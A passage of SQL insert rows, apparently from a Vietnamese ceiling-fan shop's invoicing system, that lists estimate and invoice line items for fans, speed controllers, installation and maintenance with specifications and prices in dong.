(1050, 225, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Maple Wood  - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 6600000.00, '', 1, 0, '', 0.00),
(1051, 225, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 6600000.00, '', 2, 0, '', 0.00),
(1052, 225, 'estimate', 'Haiku L 52 inch White, nhập hàng 3 tuần', 'Sải cánh 132cm (52inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: Trắng  <br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA', 1.00, 18190000.00, '', 3, 0, '', 0.00),
(1053, 225, 'estimate', 'Chi phí sơn tĩnh điện thân quạt Pearl màu trắng', 'Thời gian sơn tầm 7 - 10 ngày', 1.00, 850000.00, 'cái', 4, 0, '', 0.00),
(1054, 225, 'estimate', 'Nhân công lắp đặt quạt trần', '', 3.00, 500000.00, 'cái', 5, 0, '', 0.00),
(1055, 319, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Maple Wood  - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 6600000.00, '', 1, 0, NULL, 0.00),
(1056, 319, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 6600000.00, '', 2, 0, NULL, 0.00),
(1057, 319, 'invoice', 'Haiku L 52 inch White, nhập hàng 3 tuần', 'Sải cánh 132cm (52inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: Trắng  <br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA', 1.00, 18190000.00, '', 3, 0, NULL, 0.00),
(1058, 319, 'invoice', 'Chi phí sơn tĩnh điện thân quạt Pearl màu trắng', 'Thời gian sơn tầm 7 - 10 ngày', 1.00, 850000.00, 'cái', 4, 0, NULL, 0.00),
(1059, 319, 'invoice', 'Nhân công lắp đặt quạt trần', '', 3.00, 500000.00, 'cái', 5, 0, NULL, 0.00),
(1060, 320, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 6800000.00, 'Cái', 1, 25, 'https://hgphome.com/uploads/items/1942/thumb_abacus-crm_img.jpg', 0.00),
(1061, 219, 'estimate', 'Bộ Motor Quạt trần SINO LED 52', '', 1.00, 2500000.00, '', 2, 0, '', 0.00),
(1062, 321, 'invoice', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', '', 2.00, 750000.00, '', 1, 0, NULL, 0.00),
(1063, 321, 'invoice', 'Bộ Motor Quạt trần SINO LED 52', '', 1.00, 2500000.00, '', 2, 0, NULL, 0.00),
(1064, 322, 'invoice', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 4700000.00, 'cái', 1, 0, NULL, 0.00),
(1065, 323, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 6800000.00, 'Cái', 1, 25, 'https://hgphome.com/uploads/items/1942/thumb_abacus-crm_img.jpg', 0.00),
(1066, 323, 'invoice', 'Nhân công lắp đặt quạt trần', 'Gia cố lắp đặt trần chung cư nhà phố', 2.00, 500000.00, 'cái', 2, 0, 'https://hgphome.com/uploads/items/1924/thumb_lap_dat.jpg', 0.00),
(1068, 226, 'estimate', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT dành cho quạt 3 cánh Akamani', 'Đặt hàng tầm 25 ngày sau có hàng', 5.00, 750000.00, '', 1, 0, '', 0.00),
(1069, 324, 'invoice', 'Bảo hành Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT cho quạt 3 cánh', '', 1.00, 0.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1070, 325, 'invoice', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT dành cho quạt 3 cánh Akamani', 'Đặt hàng tầm 25 ngày sau có hàng', 5.00, 750000.00, '', 1, 0, NULL, 0.00),
(1071, 326, 'invoice', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC', 1.00, 550000.00, '', 1, 0, 'https://hgphome.com/uploads/items/1928/thumb_dieu-khien-3-cap-ac-.jpg', 0.00),
(1072, 326, 'invoice', 'Bảo dưỡng, sửa chữa quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1073, 327, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)', 2.00, 6800000.00, 'Cái', 1, 30, 'https://hgphome.com/uploads/items/1942/thumb_abacus-crm_img.jpg', 0.00),
(1074, 327, 'invoice', 'Quạt trần SAONA SLIVER 52YFT-7062S (màu Bạc)', 'Sải cánh 132cm  <br />\r\nĐộng cơ DC, công suất 36W <br />\r\nĐiều khiển 6 cấp độ  <br />\r\nMàu sắc: Bạc (Sliver) <br />\r\nĐèn LED 12W, ánh sáng 3 màu <br />\r\nThương hiệu: Mountain Air/China', 2.00, 6300000.00, '', 2, 45, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1075, 311, 'invoice', 'Quạt trần 5 cánh gỗ NEXUS 60 maple wood', 'Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Trắng <br />\r\nMàu cánh: Maple Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China', 1.00, 7900000.00, 'cái', 4, 25, 'https://hgphome.com/uploads/items/1953/thumb_nexus-60.jpg', 0.00),
(1076, 311, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Màu Light Chery', 'Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color :Light  (chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 2.00, 8600000.00, '', 5, 25, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1077, 311, 'invoice', 'Nhân công lắp đặt 3 quạt trần Tổ chức đào tạo WIT', '', 3.00, 300000.00, 'cái', 6, 0, 'https://hgphome.com/uploads/items/1924/thumb_lap_dat.jpg', 0.00),
(1078, 328, 'invoice', 'Bộ điều khiển AC 3 tốc độ Tổ chức đào tạo WIT', '', 1.00, 550000.00, '', 1, 0, 'https://hgphome.com/uploads/items/1796/thumb_dieu-khien-3-cap-ac-.jpg', 0.00),
(1079, 328, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1080, 329, 'invoice', 'Bộ điều khiển AC 3 tốc độ Tổ chức đào tạo WIT', '', 1.00, 550000.00, '', 1, 0, 'https://hgphome.com/uploads/items/1796/thumb_dieu-khien-3-cap-ac-.jpg', 0.00),
(1081, 329, 'invoice', 'Bảo dưỡng quạt', 'Chi phí bảo dưỡng quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1082, 329, 'invoice', 'Chi phí thay tụ cho quạt động cơ AC', '', 1.00, 200000.00, 'cái', 3, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1083, 330, 'invoice', 'Bảo hành Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT cho quạt akamani', '', 1.00, 0.00, 'bộ', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1084, 331, 'invoice', 'Bộ điều khiển DC 6 tốc độ Mountair Air', '', 1.00, 750000.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1085, 332, 'invoice', 'Bộ điều khiển AC gắn tường vuông 3 tốc độ Tổ chức đào tạo WIT', '', 1.00, 350000.00, '', 1, 0, 'https://hgphome.com/uploads/items/1793/thumb_dieu-khien-hop-so-ac.jpg', 0.00),
(1086, 333, 'invoice', 'Quạt trần 5 cánh gỗ NEXUS 60 maple wood', 'Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Trắng/Đen   <br />\r\nMàu cánh: Maple Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China', 1.00, 7900000.00, 'cái', 1, 50, 'https://hgphome.com/uploads/items/1953/thumb_nexus-60.jpg', 0.00),
(1087, 333, 'invoice', 'Nhân công lắp đặt quạt trần', '', 1.00, 250000.00, 'cái', 2, 0, 'https://hgphome.com/uploads/items/1924/thumb_lap_dat.jpg', 0.00),
(1088, 334, 'invoice', 'Bộ điều khiển DC 6 tốc độ Mountair Air', '', 1.00, 750000.00, 'bộ', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1089, 335, 'invoice', 'Quạt trần SINO LED 52 Black Dark Wood', 'Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nMàu thân quạt: Matt Black(Đen sơn tĩnh điện)     <br />\r\nMàu cánh: Dark Wood     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 6500000.00, '', 1, 25, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1090, 336, 'invoice', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 4700000.00, 'cái', 1, 0, 'https://hgphome.com/uploads/items/1855/thumb_sino-52-white.jpg', 0.00),
(1091, 337, 'invoice', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', '', 1.00, 750000.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1092, 338, 'invoice', 'Bộ điều khiển AC 3 tốc độ Tổ chức đào tạo WIT', '', 1.00, 550000.00, '', 1, 0, 'https://hgphome.com/uploads/items/1796/thumb_dieu-khien-3-cap-ac-.jpg', 0.00),
(1093, 339, 'invoice', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', 'bảo hành quạt 5 cánh Abacus', 1.00, 0.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1094, 340, 'invoice', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', 'Điều khiển dành cho quạt 52YFT7062K', 1.00, 750000.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1097, 341, 'invoice', 'Bộ điều khiển AC gắn tường vuông 3 tốc độ Tổ chức đào tạo WIT', '', 1.00, 350000.00, '', 1, 0, 'https://hgphome.com/uploads/items/1793/thumb_dieu-khien-hop-so-ac.jpg', 0.00),
(1098, 342, 'invoice', 'Quạt trần KATRINA Gray Dark Wood', 'Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 1.00, 6500000.00, 'Cái', 1, 25, 'https://hgphome.com/uploads/items/1940/thumb_katrina_dark.jpg', 0.00),
(1099, 227, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: NW 1902 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 6200000.00, 'sets', 1, 25, '', 0.00),
(1100, 227, 'estimate', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(1101, 343, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: NW 1902 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 6200000.00, 'sets', 1, 0, NULL, 0.00),
(1102, 343, 'invoice', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
(1103, 323, 'invoice', 'Quạt trần KATRINA 52 Gray Maple Wood', 'Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 1.00, 6500000.00, 'cái', 3, 25, 'https://hgphome.com/uploads/items/1943/thumb_katrina_maple_wood.jpg', 0.00),
(1104, 344, 'invoice', 'Quạt trần SINO 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Matte White   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: không đèn  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 4300000.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1105, 344, 'invoice', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, '', 2, 0, 'https://hgphome.com/uploads/items/1924/thumb_lap_dat.jpg', 0.00),
(1106, 345, 'invoice', 'Quạt trần cánh lớn Powerful S1 sải cánh 3m', 'Đường kính cánh: 10 ft (3 m) <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum <br />\r\nTốc độ quay tối đa / Max Speed: 70 RPM (max speed) <br />\r\nNguồn điện / Input Power: 220-240 VAC, 1Φ, 50/60 Hz <br />\r\nĐiều khiển / Control: Remote Control for Wall <br />\r\nĐộ ồn / Sound at Max Speed: &lt;35 dBA <br />\r\nTrọng lượng: 20 kg <br />\r\nDiện tích bao phủ mát / Max Affected Area: 2,153 ft2 / 200 m2 <br />\r\nLưu lượng luồng gió: 28,000 CFM (47,538 m3/h) <br />\r\n <br />\r\nCông suất động cơ / Power Consumption: 84 W (tiết kiệm điện 90% so với động cơ AC thường ở cùng sải cánh) <br />\r\nĐẶT ĐIỂM CHUNG - QUẠT TRẦN POWERFUL S1 <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum <br />\r\nPhụ kiện an toàn kèm theo, bộ phụ kiện lắp cánh quạt đã bao gồm <br />\r\nTuỳ chọn: điều khiển Modbus quản lý tập trung BMS. Liên hệ nhà cung cấp tư vấn <br />\r\nThương hiệu: SUNON/ Taiwan (thiết kế sản xuất 100% Taiwan)', 2.00, 27000000.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1107, 346, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt Black Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt Black (Đen sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ tối (DarkWood)  <br />\r\nTuỳ chọn đèn: N/A (không có)', 2.00, 6050000.00, 'Cái', 1, 0, 'https://hgphome.com/uploads/items/1942/thumb_abacus-crm_img.jpg', 0.00),
(1109, 228, 'estimate', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt Black Wood', 'Sải cánh 152cm ( ~ 60inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W   <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)   <br />\r\nMàu thân quạt: Matt Black (Đen mờ sơn tĩnh điện)   <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)   <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 6800000.00, 'cái', 1, 30, '', 0.00),
(1110, 228, 'estimate', 'Chi phí sơn cánh sang màu sẫm', '', 1.00, 750000.00, 'bộ', 2, 0, '', 0.00),
(1111, 228, 'estimate', 'chi phí ống ty 1m6', '', 1.00, 500000.00, 'ống', 3, 0, '', 0.00),
(1112, 347, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt Black Wood', 'Sải cánh 152cm ( ~ 60inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W   <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)   <br />\r\nMàu thân quạt: Matt Black (Đen mờ sơn tĩnh điện)   <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)   <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 6800000.00, 'cái', 1, 30, NULL, 0.00),
(1113, 347, 'invoice', 'Chi phí sơn cánh sang màu sẫm', '', 1.00, 750000.00, 'bộ', 2, 0, NULL, 0.00),
(1114, 347, 'invoice', 'chi phí ống ty 1m6', '', 1.00, 500000.00, 'ống', 3, 0, NULL, 0.00),
(1115, 229, 'estimate', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)  <br />\r\n', 5.00, 6800000.00, 'sets', 1, 35, '', 0.00),
(1116, 230, 'estimate', 'Quạt trần 3 cánh gỗ AKMANI 52 BN Maple Wood', 'Sải cánh 132cm   <br />\r\nMàu Cánh Quạt: Timber Wood (màu vân gỗ tự nhiên)   <br />\r\nMàu thân Quạt: Matte Black (sơn tĩnh điện màu Đen)   <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs   <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm   <br />\r\nAirflow (M3/Min): 6823 CFM   <br />\r\nTốc Độ Quay: 5-6 cấp độ gió   <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China   <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)', 1.00, 5800000.00, '', 1, 30, '', 0.00),
(1117, 231, 'estimate', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)  <br />\r\n', 1.00, 5000000.00, 'Cái', 1, 0, '', 0.00),
(1118, 231, 'estimate', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(1119, 348, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 5000000.00, 'Cái', 1, 0, NULL, 0.00),
(1120, 348, 'invoice', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
